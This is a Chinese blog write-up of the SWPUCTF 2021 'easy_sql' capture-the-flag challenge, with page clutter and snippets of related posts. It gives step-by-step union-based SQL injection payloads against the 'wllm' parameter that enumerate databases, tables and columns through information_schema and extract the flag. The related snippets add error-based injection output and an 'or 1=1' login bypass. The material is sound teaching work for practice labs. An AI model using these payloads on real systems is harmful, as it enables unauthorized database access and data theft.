[SWPUCTF 2021 新生赛]easy_sql做题过程

最新推荐文章于 2024-06-08 11:12:41 发布
最新推荐文章于 2024-06-08 11:12:41 发布
阅读量292 收藏
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heliar/article/details/135889254
版权

1.启动靶机

查看得知回显为wllm,试输入?wllm=1,发现页面正常,输入wllm=1'发现报错,说明是字符型漏洞

直到输入?wllm=1’ order by 4--+报错

输入?wllm=-1' union select 1,2,3--+查看回显

?wllm=-1' union select 1,2,database()--+查询库名

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表

再输入

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段

最后输入

-1' union select 1,2,group_concat(id,flag) from test_tb--+ 查询flag

heliar871
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 718
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
ctf(EasySQL)
Glacier_Mount的博客
10-07 595
查询语句的简单猜测
[SWPUCTF 2021 新生]easy_sql
qq_56301349的博客
07-15 3823
[SWPUCTF 2021 新生]easy_sql
BUUCTF:Web-[极客大挑战 2019]EasySQL
最新发布
wdnmddbl的博客
06-08 407
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
2021莲城杯比题包.zip
10-12
2021莲城杯比题包.zip】是一个压缩包文件,包含了参与2021年莲城杯网络安全竞的相关题目和资料。这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞...
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
HP_Easy_Start.app.zip 惠普打印机客户端驱动
01-14
HP Easy Start 是一款由惠普公司专门为Mac用户设计的应用程序,用于简化安装惠普打印机驱动的过程。这个压缩包文件`HP_Easy_Start.app.zip`包含了该应用程序的所有必要组件,使得在苹果操作系统上设置和配置惠普...
easy-to-SQL.rar_easy
09-24
最易入门SQL语句教程,学习SQL语言入门文档,对初学者非常有用。
S7-1200 PLC技术参考文档easy_plus_V4.2版本.rar
07-01
文档中的"easy_plus"可能指的是西门子提供的易用性增强工具或功能,旨在简化S7-1200的编程和调试过程。这可能包括图形化的编程界面、预设的程序模板、自动化的故障检测等,使得用户能够更高效地完成项目。 在编程...
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 562
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
BUUCTFEasySQL [SUCTF 2019]
金 帛的博客
04-18 2845
BUUCTF的WP
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1235
又是一道考察sql注入的题。
buuctf(EasySQL)
qq_75005708的博客
04-12 241
发现过滤了flag,看了其它的wp,这道题是内部查询语句,想让||不是逻辑或,用sql_mode去转换它,设置。sql_mode它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查。还有就是这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个。然后我们接着查 1;回显为1,我们接着查看表 1;2.我们查看数据库 1;0就没有什么回显,然后我们去看看源代码。也只有看出post,其它也没有什么。回显是1,我们再看看0。然后我们先输入1看看。
BUUCTF[极客大挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4249
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客大挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 906
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
BUUCTF-EasySQL(sql注入题目)
m0_74167420的博客
03-10 455
为注释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该题目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录注册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该题目中使用,
青少年ctf擂台挑战 2024 #round 1
04-16
青少年ctf擂台挑战 2024 #round 1

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值